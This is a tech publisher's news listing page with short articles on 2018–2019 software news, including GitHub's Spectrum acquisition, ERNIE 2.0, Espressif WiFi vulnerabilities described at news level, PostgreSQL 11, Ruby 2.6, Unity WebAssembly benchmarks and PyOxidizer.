Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
All Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

Tech News

3709 Articles
article-image-github-acquires-spectrum-a-community-centric-conversational-platform
Savia Lobo
03 Dec 2018
2 min read
Save for later

GitHub acquires Spectrum, a community-centric conversational platform

Savia Lobo
03 Dec 2018
2 min read
Last week, Bryn Jackson, CEO of Spectrum, a real-time community-centered conversational platform, announced that the project is now acquired by GitHub. Bryn, along with Brian Lovin, and Max Stoiber founded the Spectrum community platform in February 2017. This community is a place to ask questions, request features, report bugs, and also chat with the Spectrum team for queries. In a blogpost Bryn wrote, “After releasing an early prototype, people told us they also wanted to use it for their communities, so we decided to go all-in and build an open, inclusive home for developer and designer communities. Since officially launching the platform late last year, Spectrum has become home to almost 5,000 communities!” What will Spectrum bring to GitHub communities? By joining GitHub, Spectrum aims to align to GitHub’s goals of making developer lives easier and of fostering a strong community across the globe. For communities across GitHub, Spectrum will provide: A space for different communities across the internet. Free access to its full suite of features - including unlimited moderators, private communities and channels, and community analytics. A deeper integration with GitHub Spectrum has also opened a pull request to add some of GitHub’s policies to Spectrum’s Privacy Policy, which will be merged this week. Though many users have not heard about Spectrum, they are positively reacting towards its acquisition by GitHub. Many users have also compared it with other platforms such as Slack, Discord, and Gitter. To know more about this news, read Bryn Jackson’s blog post. GitHub Octoverse: The top programming languages of 2018 GitHub has passed an incredible 100 million repositories Github now allows repository owners to delete an issue: curse or a boon?
Read more
  • 0
  • 0
  • 6077

article-image-baidu-open-sources-ernie-2-0-a-continual-pre-training-nlp-model-that-outperforms-bert-and-xlnet-on-16-nlp-tasks
Fatema Patrawala
30 Jul 2019
3 min read
Save for later

Baidu open sources ERNIE 2.0, a continual pre-training NLP model that outperforms BERT and XLNet on 16 NLP tasks

Fatema Patrawala
30 Jul 2019
3 min read
Today Baidu released a continual natural language processing framework ERNIE 2.0. ERNIE stands for Enhanced Representation through kNowledge IntEgration. Baidu claims in its research paper that ERNIE 2.0 outperforms BERT and the recent XLNet in 16 NLP tasks in Chinese and English. Additionally, Baidu has open sourced ERNIE 2.0 model. In March Baidu had announced the release of ERNIE 1.0, its pre-trained model based on PaddlePaddle, Baidu’s deep learning open platform. According to Baidu, ERNIE 1.0 outperformed BERT in all Chinese language understanding tasks. Pre-training procedures of the models such as BERT, XLNet and ERNIE 1.0 are mainly based on a few simple tasks modeling co-occurrence of words or sentences, highlights the paper. For example, BERT constructed a bidirectional language model task and the next sentence prediction task to capture the co-occurrence information of words and sentences; XLNet constructed a permutation language model task to capture the co-occurrence information of words. But besides co-occurring information, there are much richer lexical, syntactic and semantic information in training corpora. For example, named entities, such as person names, place names, and organization names, contain concept information; Sentence order and sentence proximity information can enable the models to learn structure-aware representations; Semantic similarity at the document level or discourse relations among sentences can enable the models to learn semantic-aware representations. So is it possible to further improve the performance if the model was trained to learn more kinds of tasks constantly? Source: ERNIE 2.0 research paper Based on this idea, Baidu has proposed a continual pre-training framework for language understanding in which pre-training tasks can be incrementally built and learned through multi-task learning in a continual way. According to Baidu, in this framework, different customized tasks can be incrementally introduced at any time and these tasks are trained through multi-task learning, which enables the encoding of lexical, syntactic and semantic information across tasks. And whenever a new task arrives, this framework can incrementally train the distributed representations without forgetting the previously trained parameters. The Structure of Released ERNIE 2.0 Model Source: ERNIE 2.0 research paper ERNIE is a continual pre-training framework which provides a feasible scheme for developers to build their own NLP models. The fine-tuning source codes of ERNIE 2.0 and pre-trained English version models can be downloaded from the GitHub page. The team at Baidu compared the performance of ERNIE 2.0 model with the existing  pre-training models on the English dataset GLUE and 9 popular Chinese datasets separately. The results show that ERNIE 2.0 model outperforms BERT and XLNet on 7 GLUE language understanding tasks and outperforms BERT on all of the 9 Chinese NLP tasks, such as DuReader Machine Reading Comprehension, Sentiment Analysis and Question Answering.  Specifically, according to the experimental results on GLUE datasets, ERNIE 2.0 model almost comprehensively outperforms BERT and XLNET on English tasks, whether it is a base model or the large model. Furthermore, the research paper shows that ERNIE 2.0 large model achieves the best performance and creates new results on the Chinese NLP tasks. Source: ERNIE 2.0 research paper To know more about ERNIE 2.0, read the research paper and check out their official blog on Baidu’s website. DeepMind’s AI uses reinforcement learning to defeat humans in multiplayer games CMU and Google researchers present XLNet: a new pre-training method for language modeling that outperforms BERT on 20 tasks Transformer-XL: A Google architecture with 80% longer dependency than RNNs  
Read more
  • 0
  • 0
  • 6073

article-image-espressif-iot-devices-susceptible-to-wifi-vulnerabilities-can-allow-hijackers-to-crash-devices-connected-to-enterprise-networks
Savia Lobo
05 Sep 2019
4 min read
Save for later

Espressif IoT devices susceptible to WiFi vulnerabilities can allow hijackers to crash devices connected to enterprise networks

Savia Lobo
05 Sep 2019
4 min read
Matheus Eduardo Garbelini a member of the ASSET (Automated Systems SEcuriTy) Research Group at the Singapore University of Technology and Design released a proof of concept for three WiFi vulnerabilities in the Espressif IoT devices, ESP32/ESP8266. 3 WiFi vulnerabilities on the ESP32/8266 IoT device Zero PMK Installation (CVE-2019-12587) This WiFi vulnerability hijacks clients on version ESP32 and ESP8266 connected to enterprise networks. It allows an attacker to take control of the WiFi device EAP session by sending an EAP-Fail message in the final step during the connection between the device and the access point. The researcher discovered that both the IoT devices update their Pairwise Master Key (PMK) only when they receive an EAP-Success message. If the EAP-Fail message is received before the EAP-Success, the device skips to update the PMK received during a normal EAP exchange (EAP-PEAP, EAP-TTLS or EAP-TLS). During this time, the device normally accepts the EAPoL 4-Way handshake. Each time ESP32/ESP8266 starts, the PMK is initialized as zero, thus, if an EAP-Fail message is sent before the EAP-Success, the device uses a zero PMK. Thus allowing the attacker to hijack the connection between the AP and the device. ESP32/ESP8266 EAP client crash (CVE-2019-12586) This WiFi vulnerability is found in SDKs of ESP32 and ESP8266 and allows an attacker to precisely cause a crash in any ESP32/ESP8266 connected to an enterprise network. In combination with the zero PMK Installation vulnerability, it could increase the damages to any unpatched device. This vulnerability allows attackers in radio range to trigger a crash to any ESP device connected to an enterprise network. Espressif has fixed such a problem and committed patches for ESP32 SDK, however, the SDK and Arduino board support for ESP8266 is still unpatched. ESP8266 Beacon Frame Crash (CVE-2019-12588) In this WiFi vulnerability, CVE-2019-12588 the client 802.11 MAC implementation in Espressif ESP8266 NONOS SDK 3.0 and earlier does not correctly validate the RSN AuthKey suite list count in beacon frames, probe responses, and association responses. This allows attackers in radio range to cause a denial of service (crash) via a crafted message. Two situations in a malformed beacon frame can trigger two problems: When sending crafted 802.11 frames with the field Auth Key Management Suite Count (AKM) in RSN tag with size too large or incorrect, ESP8266 in station mode crashes. When sending crafted 802.11 frames with the field Pairwise Cipher Suite Count in RSN tag with size too large or incorrect, ESP8266 in station mode crashes. “The attacker sends a malformed beacon or probe response to an ESP8266 which is already connected to an access point. However, it was found that ESP8266 can crash even when there’s no connection to an AP, that is even when ESP8266 is just scanning for the AP,” the researcher says. A user on Hacker News writes, “Due to cheap price ($2—$5 depending on the model) and very low barrier to entry technically, these devices are both very popular as well as very widespread in those two categories. These chips are the first hits for searches such as "Arduino wifi module", "breadboard wifi", "IoT wifi module", and many, many more as they're the downright easiest way to add wifi to something that doesn't have it out of the box. I'm not sure how applicable these attack vectors are in the real world, but they affect a very large number of devices for sure.” To know more about this news in detail, read the Proof of Concept on GitHub. Other interesting news in IoT security Cisco Talos researchers disclose eight vulnerabilities in Google’s Nest Cam IQ indoor camera Microsoft reveals Russian hackers “Fancy Bear” are the culprit for IoT network breach in the U.S. Researchers reveal vulnerability that can bypass payment limits in contactless Visa card
Read more
  • 0
  • 0
  • 6070

article-image-stack-skills-not-degrees-industry-leading-companies-google-ibm-apple-no-longer-require-degrees
Bhagyashree R
22 Aug 2018
3 min read
Save for later

Stack skills, not degrees: Industry-leading companies, Google, IBM, Apple no longer require degrees

Bhagyashree R
22 Aug 2018
3 min read
Can you guess what is common between, Bill Gates, Steve Jobs, Michael Dell, Larry Ellison? Yes they are very successful trendsetters in tech, some being co-founders and founders of top tech companies. But what else? They are also college dropouts. The point here I want to highlight is that real skills are more important than acquired college degrees. If you do not have a college degree, but have the skill set a company wants, you are in! In today’s economy it is important to have hands-on experience instead of being only book smart. Last week, the job searching website, Glassdoor compiled a list of Top companies that do not require a 4 year college degree as long as you have the skills required. The list includes some of the top tech companies as well such as Google, Apple, and IBM. Google has clearly mentioned on their web page: Source: Google If no degrees, then what? Now, you must be thinking that if these companies are not looking at your GPAs then how are they going to shortlist n number of applications coming their way. Remember the names I called out in the beginning? They have something more in common. They believed in self-learning, were passionate and innovative, and had clear goals. Sam Ladah, IBM’s head of talent organization, calls these type of jobs, “new-collar jobs.” He told the Marketplace in an interview that IBM consider the applicants based on their skills. This includes applicants who didn’t get a four-year degree but have proven their technical knowledge in other ways. Some have technical certifications, and others have enrolled in other skills programs. They have also been finding talents from coding bootcamps. A very good example of finding talent beyond traditional educational boundaries is Tanmay Bakshi, one of the youngest software programmers in the world. At the age of 11, he came across a documentary on the IBM Watson and how it played Jeopardy. He was immediately hooked to IBM Watson and AI and found inspiration to build his own first Watson app called “Ask Tanmay”. Later he was able to find a bug in the Document Conversion service by IBM and posted that on his Twitter. IBMers who were working on this service took a note of this and contacted Tanmay. Two of those initial contacts eventually became his mentors and assisted him in collaborating with IBM. Even if you have a degree in any other background but are keen on learning software development and bagging a job in top-tech companies, you can start anytime. Margaret Hamilton, the Director of the Software Engineer Division of the MIT Instrumentation Laboratory in 1960 and later the CEO of Hamilton Technologies, Inc, was actually a Mathematics graduate. Angela Taylor, who was working as an HR person in Google, with her hardwork and can-do attitude became a Google engineer. She fell in love with programming when she volunteered to fix a spreadsheet and learned Visual Basic for it. These were a few examples of the people who were able to challenge the current education system and became successful. Here is a great Medium post which could give you some amazing tips to further your career, if you are a coder but not an engineer. 1k+ Google employees frustrated with continued betrayal, protest against Censored Search engine project for China 16 year old hacked into Apple’s servers, accessed ‘extremely secure’ customer accounts for over a year undetected Facebook, Apple, Spotify pull Alex Jones content
Read more
  • 0
  • 1
  • 6066

article-image-postgresql-11-is-here-with-improved-partitioning-performance-query-parallelism-and-jit-compilation
Natasha Mathur
19 Oct 2018
3 min read
Save for later

PostgreSQL 11 is here with improved partitioning performance, query parallelism, and JIT compilation

Natasha Mathur
19 Oct 2018
3 min read
After releasing PostgreSQL 11 beta 1, back in May, the PostgreSQL Global Development Group finally released PostgreSQL 11, yesterday. PostgreSQL 11 explores features such as increased performance for partitioning, support for transactions in stored procedures, improved capabilities for query parallelism, and Just-in-Time (JIT) compilation for expressions among other updates. PostgreSQL is a popular open source relational database management system that offers better reliability, robustness, and enhanced performance measures. Let’s have a look at these features in PostgreSQL 11. Increased performance for partitioning PostgreSQL 11 comes with an ability to partition the data using a hash key, which is known as hash partitioning. This adds to the already existing ability to partition data in PostgreSQL using a list of values or by a range. Moreover, PostgreSQL 11 also improves the data federation abilities by implementing functionality improvements for partitions using PostgreSQL foreign data wrapper, and postgres_fdw. For managing these partitions, PostgreSQL 11 comes with a “catch-all” default partition for data that doesn’t match a partition key. It also comes with an ability to create primary keys, foreign keys, indexes as well as triggers on partitioned tables. The latest release also offers support for automatic movement of rows to the correct partition, given that the partition key for that row is updated. Additionally, PostgreSQL 11 enhances the query performance when reading from partitions with the help of a new partition elimination strategy. It also offers support for the popular "upsert" feature on partitioned tables. The upsert feature helps users simplify the application code as well as reduce the network overhead when interacting with their data. Support for transactions in stored procedures With PostgreSQL 11 comes newly added SQL procedures that help perform full transaction management within the body of a function. This enables the developers to build advanced server-side applications like the ones that involve incremental bulk data loading. Also, SQL procedures can now be created using the CREATE PROCEDURE command which is executed using the CALL command. These SQL procedures are supported by the server-side procedural languages such as PL/pgSQL, PL/Perl, PL/Python, and PL/Tcl. Improved capabilities for query parallelism PostgreSQL 11 enhances the parallel query performance, using the performance gains in parallel sequential scans and hash joins. It also performs more efficient scans of the partitioned data. PostgreSQL 11 comes with added parallelism for a range of data definitions commands, especially for the creation of B-tree indexes generated by executing the standard CREATE INDEX command. Other data definition commands that either create tables or materialize the views from queries are also enabled with parallelism. This includes the CREATE TABLE .. AS, SELECT INTO, and CREATE MATERIALIZED VIEW. Just-in-Time (JIT) compilation for expressions PostgreSQL 11 offers support for Just-In-Time (JIT) compilation, This helps to accelerate the execution of certain expressions during query execution. The JIT expression compilation uses the LLVM project to boost the execution of expressions in WHERE clauses, target lists, aggregates, projections, as well as some other internal operations. Other Improvements ALTER TABLE .. ADD COLUMN .. DEFAULT ..have been replaced with a not NULL default to rewrite the whole table on execution. This offers a significant performance boost when running this command. Additional functionality has been added for working with window functions, including allowing RANGE to use PRECEDING/FOLLOWING, GROUPS, and frame exclusion. Keywords such as "quit" and "exit" have been added to the PostgreSQL command-line interface to help make it easier to leave the command-line tool. For more information, check out the official release notes. PostgreSQL group releases an update to 9.6.10, 9.5.14, 9.4.19, 9.3.24 How to perform data partitioning in PostgreSQL 10 How to write effective Stored Procedures in PostgreSQL
Read more
  • 0
  • 0
  • 6050

article-image-magic-leap-unveils-mica-a-human-like-ai-in-augmented-reality
Sugandha Lahoti
12 Oct 2018
3 min read
Save for later

Magic Leap unveils Mica, a human-like AI in augmented reality

Sugandha Lahoti
12 Oct 2018
3 min read
In the keynote of their developer conference L.E.A.P., which took place Wednesday, Magic Leap showed a demo of their new human-like AI. Dubbed, Mica, she can communicate with a viewer through the company’s augmented reality glasses, the Magic Leap One Creator Edition. Basically, Mica is a short-haired woman who can express facial expressions closely resembling a normal human. She does not speak but can still communicate in warm ways with the viewer. The project was presented at the Magic Leap L.E.A.P. event by Andrew Rabinovich, head of AI at Magic Leap, and John Monos, head of human-centered AI. According to the keynote, Mica is their prototype for developing systems to create digital human representations. The first prototype came up with a realistic eye gaze and eye movement. Artificial Intelligence components were then added to track users and look them in the eye. Additional AI elements were then added for body language and posture. According to Nick Whiting from Epic Games, Mica is powered by Unreal Engine 4. Magic Leap focused on creating natural facial expressions that can emote in believable ways. Their main goal was to create facial elements that connect users to her. Mica came out as an ideal interface to human-centered AI that evokes natural reactions from the users. Mica gets the interactions and intelligence to how people expect. User focus becomes the temperament for Mica, her personality traits, and mannerism are aligned to how the users are with her. VentureBeat’s correspondent was invited for a demo of Mica. Per his experience, “ I walked into a  physical room and sat in a chair. Mica was sitting at the table in the same room. She smiled at me and look at me. I was struck that she wasn’t just looking at me. She was looking in my eyes. She tilted her head from side to side. When I noticed how attentive she was, I moved my head forward and looked in her eyes. She did the same and looked at me. I moved my head back and she moved her head back too. She was mimicking some of the movements that she saw me make. She didn’t talk, but that is coming in the future.” Magic Leap’s Mica is a clear indication of what the virtual assistant future will look like for most people in the very near future. Read more about Magic Leap’s L.E.A.P conference to know what else was announced. You may also watch the keynote. Magic Leap teams with Andy Serkis’ Imaginarium Studios to enhance Augmented Reality. Understanding the hype behind Magic Leap’s New Augmented Reality Headsets. Magic Leap One, the first mixed reality headsets by Magic Leap, is now available at $2295.
Read more
  • 0
  • 0
  • 6048
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at $15.99/month. Cancel anytime
article-image-ruby-2-6-0-released-with-a-new-jit-compiler
Prasad Ramesh
26 Dec 2018
2 min read
Save for later

Ruby 2.6.0 released with a new JIT compiler

Prasad Ramesh
26 Dec 2018
2 min read
Ruby 2.6.0 was released yesterday and brings a new JIT compiler. The new version also has the RubyVM::AbstractSyntaxTree module. The new JIT compiler in Ruby 2.6.0 Ruby 2.6.0 comes with an early implementation of a Just-In-Time (JIT) compiler. The JIT compiler was introduced in Ruby to improve the performance of programs made with Ruby. Traditional JIT compilers operate in-process but Ruby’s JIT compiler gives out C code to the disk and generates a common C compiler to create native code. To enable the JIT compiler, you just need to specify --jit either on the command line or in the $RUBYOPT environment variable. Using --jit-verbose=1 will cause the JIT compiler to print additional information. The JIT compiler will work only when Ruby is built by GCC, Clang, or Microsoft Visual C++. Any of these compilers need to be available at runtime. On Optcarrot, a CPU intensive benchmark, Ruby 2.6 has 1.7x faster performance compared to Ruby 2.5. The JIT compiler, however, is still experimental and workloads like Rails might not benefit from for now. The RubyVM::AbstractSyntaxTree module Ruby 2.6 brings the RubyVM::AbstractSyntaxTree module and the team does not guarantee any future compatibility of this module. The module has a parse method, which parses the given string as Ruby code and returns the Abstract Syntax Tree (AST) nodes in the code. The given file is opened and parsed by the parse_file method as Ruby code, this returns AST nodes. A RubyVM::AbstractSyntaxTree::Node class—another experimental feature—is also introduced in Ruby 2.6.0. Developers can get source location and children nodes from the Node objects. To know more about other new features and improvements in detail, visit the Ruby 2.6.0 release notes. 8 programming languages to learn in 2019 Clojure 1.10 released with Prepl, improved error reporting and Java compatibility NumPy drops Python 2 support. Now you need Python 3.5 or later.
Read more
  • 0
  • 0
  • 6032

article-image-facebook-mandates-visual-studio-code-as-default-development-environment-and-partners-with-microsoft-for-remote-development-extensions
Fatema Patrawala
21 Nov 2019
4 min read
Save for later

Facebook mandates Visual Studio Code as default development environment and partners with Microsoft for remote development extensions

Fatema Patrawala
21 Nov 2019
4 min read
On Tuesday, Facebook mandates Visual Studio Code, the source code editor developed by Microsoft, as their default development environment. Additionally, they also stated that the company will work with Microsoft to expand the remote development extension for Visual Studio Code so that engineers can do large-scale remote development. As per the official announcement page, Facebook engineers have written millions of lines of codes and there is no mandated development environment. Till now Facebook developers used Vim or Emacs  and the development environment was disjointed. And certain developers also used Nuclide, an integrated development environment developed by Facebook. But in late 2018, they announced to their internal engineers that they would move Nuclide to Visual Studio Code. They have also done plenty of development work to migrate the current Nuclide functionality, along with new features to Visual Studio Code and currently it is used extensively across the company in beta. Why Visual Studio Code? The Visual Studio Code is a very popular development tool, with great support from Microsoft and the open source community. It runs on macOS, Windows, and Linux, and has a robust and well-defined extension API that enables to continue building the important capabilities required for the large-scale development done at Facebook. The company believes that it is a platform on which they can safely bet their development platform future. They have also partnered with Microsoft for remote development. At present, Facebook engineers install Visual Studio Code on a local PC, but the actual development is done directly on the development server in the data center. Therefore, it aims to improve efficiency and productivity by making the code on the server accessible in a seamless and high-performance manner. The company believes that using remote extensions will provide many benefits like: Work with larger, faster, or more specialized hardware than what’s available on local machine Create tailored, dedicated environments for each project’s specific dependencies, without worrying about errors due to mixed or conflicting configurations Support the flexibility of being able to quickly switch between multiple running development environments without impacting local resources or tool performance Facebook mandates Visual Studio Code as an integrated development environment which can be used internally, specifically, because Facebook uses various programming languages. It also uses Mercurial as the source control infrastructure, it will work on the development of extensions to allow direct source control operations within Visual Studio Code. Facebook states, “VS Code is now an established part of Facebook’s development future. In teaming with Microsoft, we’re looking forward to being part of the community that helps Visual Studio Code continue to be a world class development tool.” On Hacker News, developers are discussing various issues related to remote development extensions in VS Code, one of them is it is not open-source and Facebook should take efforts to make it an open project. One comment reads, “Just an FYI for people - The Remote Development extensions are not open source. I'd hope if Facebook were joining efforts, they'd do so on a more open project. 1: https://code.visualstudio.com/docs/remote/faq#_why-arent-the... 2: https://github.com/microsoft/vscode/wiki/Differences-between... 3: https://github.com/VSCodium/vscodium/issues/240 (aka, on-the-wire DRM to make sure the remote components only talk to a licensed VS Code build from Microsoft) MS edited the licensing terms many moons ago, to prepare for VS Code in browser using these remote extensions/apis that no one else can use)- https://github.com/microsoft/vscode/issues/48279 Finally, this is the thread where you will see regular users being negatively impacted by the DRM (a closed source, non-statically linked proprietary binary downloaded at runtime) that implements this proprietary-ness: https://github.com/microsoft/vscode-remote-release/issues/10... (of course, also with enough details to potentially patch around this issue if you were so inclined). Further, MS acknowledged that statically linking would help in May, and yet it appears to still be an issue. I just hope they don't come after Eclipse Theia…” Microsoft releases Cascadia Code version 1909.16, the latest monospaced font for Windows Terminal and Visual Studio Code 12 Visual Studio Code extensions that Node.js developers will love [Sponsored by Microsoft] 5 developers explain why they use Visual Studio Code [Sponsored by Microsoft] 5 useful Visual Studio Code extensions for Angular developers Facebook releases PyTorch 1.3 with named tensors, PyTorch Mobile, 8-bit model quantization, and more
Read more
  • 0
  • 0
  • 6009

article-image-unity-benchmark-report-webassembly-performance-in-browsers
Sugandha Lahoti
18 Sep 2018
2 min read
Save for later

Unity Benchmark report approves WebAssembly load times and performance in popular web browsers

Sugandha Lahoti
18 Sep 2018
2 min read
Unity has released a benchmarking report after two years since the last Unity Benchmark report comparing the performance and load times of WebAssembly with asm.js. They have compared the performance of Unity WebGL in four major web browsers: Firefox 61, Chrome 70, Safari 11.1.2 and Edge 17.  Last month, Unity officially announced that it is finally making the switch to WebAssembly as their output format for the Unity WebGL build target. Note: All images and graphs are taken from the Unity Blog. For running the tests, the team rebuilt the Benchmark project with Unity 2018.2.5f1 using the following Unity WebGL Player Settings: Here are the findings from the report. Criteria 1: Total amount of time taken to get to the main screen for both WebAssembly and asm.js. Findings: Firefox is comparatively fast to load on both Windows and macOS Chrome and Edge load faster when using WebAssembly All browsers, except Safari, load faster with WebAssembly compared to asm.js. Criteria 2: In-Depth Load Times for WebAssembly-only. The team compared four factors: WebAssembly compilation and instantiation. Unity engine initialization and first scene load. Time it takes to render first frame. Time it takes to load and have a stable frame-rate. Findings: Firefox is the fastest overall on both Windows and Mac Edge compiles Wasm quickly (even faster than Firefox) but is slower in Unity engine initialization. Criteria 3: Performance and Load times for Real-World Projects Real-world projects result in larger builds which impact the end-user’s experience. Here is an overview of total scores using WebAssembly and asm.js Findings: All browsers perform better when using WebAssembly On Windows, all browsers perform similarly On macOS, Firefox outperforms all other browsers. Safari is the browser that benefits the most by WebAssembly since it doesn’t support asm.js optimizations. Conclusion The report findings conclude that modern browsers load faster and perform better thanks to WebAssembly. It also provides more consistent user experience as compared to asm.js. Read more about the findings on the Unity Blog. Unity releases ML-Agents toolkit v0.5 with Gym interface, a new suite of learning environments. Key Takeaways from the Unity Game Studio Report 2018. Unity switches to WebAssembly as the output format for the Unity WebGL build target.  
Read more
  • 0
  • 0
  • 5978

article-image-introducing-pyoxidizer-an-open-source-utility-for-producing-standalone-python-applications-written-in-rust
Bhagyashree R
26 Jun 2019
4 min read
Save for later

Introducing PyOxidizer, an open source utility for producing standalone Python applications, written in Rust

Bhagyashree R
26 Jun 2019
4 min read
On Monday, Gregory Szorc, a Developer Productivity Engineer at Airbnb, introduced PyOxidizer, a Python application packaging and distribution tool written in Rust. This tool is available for Windows, macOS, and Linux operating systems. Sharing his vision behind this tool, Szorc wrote in the announcement, “I want PyOxidizer to provide a Python application packaging and distribution experience that just works with a minimal cognitive effort from Python application maintainers.” https://twitter.com/indygreg/status/1143187250743668736 PyOxidizer aims to solve complex packaging and distribution problems so that developers can put their efforts into building applications instead of juggling with build systems and packaging tools. According to the GitHub README, “PyOxidizer is a collection of Rust crates that facilitate building libraries and binaries containing Python interpreters.” Its most visible component is the ‘pyoxidizer’ command line tool. With this tool, you can create new projects, add PyOxidizer to existing projects, produce binaries containing a Python interpreter, and various related functionality. How PyOxidizer is different from other Python application packaging/distribution tools PyOxidizer provides the following benefits over other Python application packaging/distribution tools: It works across all popular platforms, unlike many other tools that only target Windows or macOS. It works even if the executing system does not have Python installed. It does not have special system requirements like SquashFS, container runtimes, etc. Its startup performance is comparable to traditional Python execution. It supports single file executables with minimal or none system dependencies. Here are some of the features PyOxidizer comes with: Generates a standalone single executable file One of the most important features of PyOxidizer is that it can produce a single executable file that contains a fully-featured Python interpreter, its extensions, standard library, and your application's modules and resources. PyOxidizer embeds self-contained Python interpreters as a tool and software library by exposing its lower-level functionality. Serves as a bridge between Rust and Python The ‘Oxidizer’ part in PyOxidizer comes from Rust. Internally, it uses Rust to produce executables and manage the embedded Python interpreter and its operations. Along with solving the problem of packaging and distribution with Rust, PyOxidizer can also serve as a bridge between these two languages. This makes it possible to add a Python interpreter to any Rust project and vice versa. With PyOxidizer, you can bootstrap a new Rust project that contains an embedded version of Python and your application. “Initially, your project is a few lines of Rust that instantiates a Python interpreter and runs Python code. Over time, the functionality could be (re)written in Rust and your previously Python-only project could leverage Rust and its diverse ecosystem,” explained Szorc. The creator chose Rust for the run-time and build-time components because it is considered to be one of the superior systems programming languages and does not require considerable effort solving difficult problems like cross-compiling. He believes that implementing the embedding component in Rust also opens more opportunities to embed Python in Rust programs. “This is largely an unexplored area in the Python ecosystem and the author hopes that PyOxidizer plays a part in more people embedding Python in Rust,” he added. PyOxidizer executables are faster to start and import During the execution, binaries built with PyOxidizer does not have to do anything special like creating a temporary directory to run the Python interpreter. Everything is loaded directly from the memory without any explicit I/O operations. So, when a Python module is imported, its bytecode is loaded from a memory address in the executable using zero-copy. This results in making the executables produced by PyOxidizer faster to start and import. PyOxidizer is still in its early stages. Yesterday’s initial release is good at producing executables embedding Python. However, not much has been implemented yet to solve the distribution part of the problem. Some of the missing features that we can expect to come in the future are an official build environment, support for C extensions, more robust packaging support, easy distribution, and more. The creator encourages Python developers to try this tool and share feedback with him or file an issue on GitHub. You can also contribute to this project via Patreon or PayPal. Many users are excited to try this tool: https://twitter.com/kevindcon/status/1143750501592211456 https://twitter.com/acemarke/status/1143389113871040517 Read the announcement made by Szorc to know more in detail. Python 3.8 beta 1 is now ready for you to test PyPI announces 2FA for securing Python package downloads Matplotlib 3.1 releases with Python 3.6+ support, secondary axis support, and more
Read more
  • 0
  • 0
  • 5976
article-image-introducing-deon-a-tool-for-data-scientists-to-add-an-ethics-checklist
Natasha Mathur
06 Sep 2018
5 min read
Save for later

Introducing Deon, a tool for data scientists to add an ethics checklist

Natasha Mathur
06 Sep 2018
5 min read
Drivendata has come out with a new tool, named, Deon, which allows you to easily add an ethics checklist to your data science projects. Deon is aimed at pushing the conversation about ethics in data science, machine learning, and Artificial intelligence by providing actionable reminders to data scientists. According to the Deon team, “it's not up to data scientists alone to decide what the ethical course of action is. This has always been a responsibility of organizations that are part of civil society. This checklist is designed to provoke conversations around issues where data scientists have particular responsibility and perspective”. Deon comes with a default checklist, but you can also develop your own custom checklists by removing items and sections, or marking items as N/A depending on the needs of the project. There are also real-world examples linked with each item in the default checklist.   To be able to run Deon for your data science projects, you need to have Python 3 or greater. Let’s now discuss the two types of checklists, Default, and Custom, that comes with Deon. Default checklist The default checklist comprises of sections on Data Collection, Data Storage, Analysis, Modeling, and Deployment. Data Collection This checklist covers information on informed consent, Collection Bias, and Limit PII exposure. Informed consent includes a mechanism for gathering consent where users have clear understanding of what they are consenting to. Collection Bias checks on sources of bias introduced during data collection and survey design. Lastly, Limit PII exposure talks about ways that can help minimize the exposure of personally identifiable information (PII). Data Storage This checklist covers sections such as Data security, Right to be forgotten and Data retention plan. Data Security refers to a plan to protect and secure data. Right to be forgotten includes a mechanism by which an individual can have his/her personal information. Data Retention consists of a plan to delete the data if no longer needed. Analysis This section comprises information on Missing perspectives, Dataset bias, Honest representation, Privacy in analysis and Auditability. Missing perspectives address the blind spots in data analysis via engagement with relevant stakeholders. Dataset bias discusses examining the data for possible sources of bias and consists of steps to mitigate or address them. Honest representation checks if visualizations, summary statistics, and reports designed honestly represent the underlying data. Privacy in analysis ensures that the data with PII are not used or displayed unless necessary for the analysis. Auditability refers to the process of producing an analysis which is well documented and reproducible. Modeling This offers information on Proxy discrimination, Fairness across groups, Metric selection,  Explainability, and Communicate bias. Proxy discrimination talks about ensuring that the model does not rely on variables or proxies that are discriminatory. Fairness across groups is a section that cross-checks whether the model results have been tested for fairness with respect to different affected groups. Metric selection considers the effects of optimizing for defined metrics and other additional metrics. Explainability talks about explaining the model’s decision in understandable terms. Communicate bias makes sure that the shortcomings, limitations, and biases of the model have been properly communicated to relevant stakeholders. Deployment This covers topics such as Redress, Roll back, Concept drift, and Unintended use. Redress discusses with an organization a plan for response in case users get harmed by the results. Roll back talks about a way to turn off or roll back the model in production when required. Concept drift refers to changing relationships between input and output data in a problem over time. This part in a checklist reminds the user to test and monitor the concept drift. This is to ensure that the model remains fair over time. Unintended use prompts the user about the steps to be taken for identifying and preventing uses and abuse of the model. Custom checklists For your projects with particular concerns, it is recommended to create your own checklist.yml file. Custom checklists are required to follow the same schema as checklist.yml. Custom Checklists need to have a top-level title which is a string, and sections which are a list. Each section in the list must have a title, a section_id, and then a list of lines. Each line must include a line_id, a line_summary, and a line string which is the content. When changing the default checklist, it is necessary to keep in mind that Deon’s goal is to have checklist items that are actionable. This is why users are advised to avoid suggesting items that are vague (e.g., "do no harm") or extremely specific (e.g., "remove social security numbers from data"). For more information, be sure to check out the official Drivendata blog post. The Cambridge Analytica scandal and ethics in data science OpenAI charter puts safety, standards, and transparency first 20 lessons on bias in machine learning systems by Kate Crawford at NIPS 2017
Read more
  • 0
  • 0
  • 5968

article-image-net-core-2-0-reaches-end-of-life-no-longer-supported-by-microsoft
Prasad Ramesh
04 Oct 2018
2 min read
Save for later

.NET Core 2.0 reaches end of life, no longer supported by Microsoft

Prasad Ramesh
04 Oct 2018
2 min read
